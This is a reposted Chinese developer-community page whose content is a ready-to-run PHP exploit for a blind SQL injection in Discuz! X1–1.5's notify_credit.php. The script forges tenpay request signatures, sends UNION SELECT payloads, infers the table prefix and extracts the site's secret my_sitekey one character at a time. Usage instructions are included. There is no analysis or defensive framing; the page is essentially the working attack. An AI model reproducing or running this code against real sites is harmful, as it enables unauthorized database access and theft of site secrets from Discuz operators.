开发者社区> 技术小美> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

DiscuzX1-1.5 Sql 0day!!

简介:
+关注继续查看

 RT~


  1. <?php 
  2. print_r(' 
  3. +---------------------------------------------------------------------------+ 
  4. Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit 
  5. by toby57    2010.11.05 
  6. mail: toby57 at 163 dot com 
  7. team: http://www.wolvez.org 
  8. +---------------------------------------------------------------------------+ 
  9. '); 
  10. if ($argc < 2) { 
  11.     print_r(' 
  12. +---------------------------------------------------------------------------+ 
  13. Usage: php '.$argv[0].' url [pre] 
  14. Example: 
  15. php '.$argv[0].' http://localhost/ 
  16. php '.$argv[0].' http://localhost/ xss_ 
  17. +---------------------------------------------------------------------------+ 
  18. '); 
  19.     exit
  20. error_reporting(7); 
  21. ini_set('max_execution_time', 0); 
  22. $url = $argv[1]; 
  23. $pre = $argv[2]?$argv[2]:'pre_'
  24. $target = parse_url($url); 
  25. extract($target); 
  26. $path .= '/api/trade/notify_credit.php'
  27. $hash = array(); 
  28. $hash = array_merge($hash, range(48, 57)); 
  29. $hash = array_merge($hash, range(97, 102)); 
  30.  
  31. $tmp_expstr = "'"
  32. $res = send(); 
  33. if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops.I can NOT hack it.');} 
  34. preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match); 
  35. if($match[1])$pre = $match[1]; 
  36. $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='"
  37. $res = send(); 
  38. if(strpos($res,"doesn't exist")!==false){ 
  39.     echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n"
  40.     for($i = 1;$i<20;$i++){ 
  41.     $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='"
  42.     $res = send(); 
  43.  
  44.     if(strpos($res,'SQL syntax')!==false){   
  45.  
  46.     $pre = ''
  47.     $hash2 = array(); 
  48.     $hash2 = array_merge($hash2, range(48, 57)); 
  49.     $hash2 = array_merge($hash2, range(97, 122)); 
  50.     $hash2[] = 95; 
  51.     for($j = 1;$j <= $i$j++){ 
  52.     for ($k = 0; $k <= 255; $k++) { 
  53.     if(in_array($k$hash2)) { 
  54.     $char = dechex($k); 
  55.     $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='"
  56.     $res = send(); 
  57.     if(strpos($res,'SQL syntax')!==false){ 
  58.         echo chr($k); 
  59.         $pre .= chr($k);break
  60.     }  
  61.     }  
  62.     }     
  63.     }     
  64.     if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{die('GET Table_pre Failed..');}; 
  65.     }    }    }; 
  66. echo "Please Waiting....\n"
  67. $sitekey = ''
  68. for($i = 1;$i <= 32; $i++){ 
  69.   for ($k = 0; $k <= 255; $k++) { 
  70.     if(in_array($k$hash)) { 
  71.     $char = dechex($k); 
  72. $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='"
  73. $res = send(); 
  74. if(strpos($res,'SQL syntax')!==false){ 
  75.         echo chr($k); 
  76.         $sitekey .= chr($k);break
  77. }}}} 
  78. if(strlen($sitekey)!=32)die("\n".'can NOT get the my_sitekey..'); 
  79. echo "\n".'Exploit Successfully.'."\nmy_sitekey:{$sitekey}"
  80. exit
  81.  
  82. function sign($exp_str){ 
  83.     return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key="); 
  84.  
  85. function send(){ 
  86.     global $host$path$tmp_expstr
  87.      
  88.     $expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=".urlencode(urlencode($tmp_expstr))."&sign=".sign($tmp_expstr); 
  89.     $data  = "POST $path HTTP/1.1\r\n"
  90.     $data .= "Host: $host\r\n"
  91.     $data .= "Content-Type: application/x-www-form-urlencoded\r\n"
  92.     $data .= "Content-Length: ".strlen($expdata)."\r\n"
  93.     $data .= "Connection: Close\r\n\r\n"
  94.     $data .= $expdata
  95.     $fp = fsockopen($host, 80); 
  96.     fputs($fp$data); 
  97.     $resp = ''
  98.     while ($fp && !feof($fp)) 
  99.         $resp .= fread($fp, 1024); 
  100.     return $resp
  101. }   
  102. ?> 

 










本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/579638,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
MySQL千万数据方案调研,一不小心直接打挂我系统
大家好,我是Leo。 之前聊的RocketMQ暂时放放,目前正在调研一个千万数据的处理方案。 在准备测试数据的时候,执行了个 select 把我电脑内存打光了。然后OOM,黑屏,宕机。。
28 0
java Mysql 根据经纬度实时计算地址位置距离
java Mysql 根据经纬度实时计算地址位置距离
57 0
Docker的Mysql数据库:把数据存储在本地目录
Docker mysql 把数据存储在本地目录,很简单,只需要映射本地目录到容器即可
159 0
【SSD系列】DOM0, DOM1, DOM2, DOM3, DOM4,知多少
DOM(文档对象模型)是针对 HTML和 XML文档的一个API(应用程序编程接口)。DOM描绘了一个层次化的节点树,允许开发人员添加、移除和修改页面的某一部分。DOM 脱胎于Netscape及微软公司创始的 DHTML(动态 HTML),但现在它已经成为表现和操作页面标记的真正的跨平台、语言中立的方式。
67 0
Docker的Mysql数据库:把数据存储在本地目录
Docker mysql 把数据存储在本地目录,很简单,只需要映射本地目录到容器即可 1、加上-v参数 $ docker run -d -e MYSQL_ROOT_PASSWORD=admin --name mysql -v /data/mysql/data:/var/lib/mysql -p 33...
1370 0
《Adobe Illustrator CS4中文版经典教程》—第0课0.14节使用符号
<span style='letter-spacing:1px'>本节书摘来自异步社区《Adobe Illustrator CS4中文版经典教程》一书中的第0课0.14节使用符号,作者【美】Adobe公司,更多章节内容可以访问云栖社区“异步社区”公众号查看。</span>
1165 0
+关注
6819
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载